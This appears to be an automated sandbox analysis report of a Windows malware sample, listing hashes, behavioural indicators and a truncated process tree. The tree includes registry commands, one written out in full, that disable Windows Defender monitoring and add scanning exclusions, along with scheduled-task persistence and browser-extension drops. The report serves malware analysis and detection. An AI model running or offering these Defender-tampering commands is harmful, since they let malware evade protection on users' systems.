Analysis
-
max time kernel
132s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
22-12-2022 03:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
5e84e10d5c27e0720def6695c6df0d4e
-
SHA1
2cd1c47997de3dce1bb27e99f209b8ecd1849097
-
SHA256
a5a85d00cdf09a5c1a0b3ba436eaa744a367d2b69f0e7721bc31b6df3a36e03b
-
SHA512
f04cef1b6c8c7f9a0b1acb86b7adf5ef5a6968b9a8f64f0afa0b146c19414a5867066d98b4dd109c9c0104618ffc1af7e11e5574ae04e1ea7353ea3d53a8ba09
-
SSDEEP
196608:91OlVN7n+AhipoZhJczBp1M7eIecZDYP69MSSqR/F8WIQSLO/lC:3OlVNhIMe1c5K69MDfzdO/lC
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 984 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1224 Install.exe 988 Install.exe 1060 vrYgctv.exe 520 aqjIwDX.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation aqjIwDX.exe -
Loads dropped DLL 12 IoCs
pid Process 1212 file.exe 1224 Install.exe 1224 Install.exe 1224 Install.exe 1224 Install.exe 988 Install.exe 988 Install.exe 988 Install.exe 984 rundll32.exe 984 rundll32.exe 984 rundll32.exe 984 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json aqjIwDX.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vrYgctv.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vrYgctv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D aqjIwDX.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol aqjIwDX.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vrYgctv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D aqjIwDX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 aqjIwDX.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA aqjIwDX.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak aqjIwDX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja aqjIwDX.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\wSVqlQY.xml aqjIwDX.exe File created C:\Program Files (x86)\LJVhNoouCIYvC\FrVAdHh.xml aqjIwDX.exe File created C:\Program Files (x86)\fFIwvsLyPfUn\ZYfNpyS.dll aqjIwDX.exe File created C:\Program Files (x86)\xPPqLUFFU\CxkoPc.dll aqjIwDX.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aqjIwDX.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\xCrxmkeokPWch.dll aqjIwDX.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\PVXenGi.dll aqjIwDX.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\uPnwpTN.xml aqjIwDX.exe File created C:\Program Files (x86)\LJVhNoouCIYvC\NVbrZVX.dll aqjIwDX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi aqjIwDX.exe File created C:\Program Files (x86)\xPPqLUFFU\iMoiBTK.xml aqjIwDX.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bcmBoHFysFBidtSprQ.job schtasks.exe File created C:\Windows\Tasks\yTojJpVlyxZWLIphK.job schtasks.exe File created C:\Windows\Tasks\mvThVpxzbhgVRbG.job schtasks.exe File created C:\Windows\Tasks\diAnMdtAazTJxxqKi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1928 schtasks.exe 1356 schtasks.exe 844 schtasks.exe 568 schtasks.exe 1324 schtasks.exe 1320 schtasks.exe 1384 schtasks.exe 1924 schtasks.exe 304 schtasks.exe 1472 schtasks.exe 1012 schtasks.exe 1696 schtasks.exe 428 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6}\WpadNetworkName = "Network 3" aqjIwDX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDecisionReason = "1" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates aqjIwDX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6} aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs aqjIwDX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6}\WpadDecisionReason = "1" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust aqjIwDX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings aqjIwDX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6}\f2-00-62-20-4b-7d aqjIwDX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDecision = "0" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople aqjIwDX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6}\WpadDecisionTime = e060e638be15d901 aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs aqjIwDX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDecisionTime = e060e638be15d901 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople aqjIwDX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates aqjIwDX.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs aqjIwDX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0083000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root aqjIwDX.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFF4FA3D-9664-4E20-8EFD-5AB38AA6AFE6}\WpadDecision = "0" aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates aqjIwDX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-00-62-20-4b-7d\WpadDecisionTime = e060e638be15d901 aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates aqjIwDX.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs aqjIwDX.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 aqjIwDX.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1684 powershell.EXE 1684 powershell.EXE 1684 powershell.EXE 1124 powershell.EXE 1124 powershell.EXE 1124 powershell.EXE 1164 powershell.EXE 1164 powershell.EXE 1164 powershell.EXE 1876 powershell.EXE 1876 powershell.EXE 1876 powershell.EXE 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe 520 aqjIwDX.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1684 powershell.EXE Token: SeDebugPrivilege 1124 powershell.EXE Token: SeDebugPrivilege 1164 powershell.EXE Token: SeDebugPrivilege 1876 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1212 wrote to memory of 1224 1212 file.exe 28 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 1224 wrote to memory of 988 1224 Install.exe 29 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 772 988 Install.exe 31 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 988 wrote to memory of 588 988 Install.exe 33 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 772 wrote to memory of 1144 772 forfiles.exe 35 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 1144 wrote to memory of 1332 1144 cmd.exe 37 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 588 wrote to memory of 636 588 forfiles.exe 36 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 636 wrote to memory of 1840 636 cmd.exe 38 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 1144 wrote to memory of 1524 1144 cmd.exe 39 PID 636 wrote to memory of 1924 636 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\7zSF02A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\7zSFD53.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:772 -
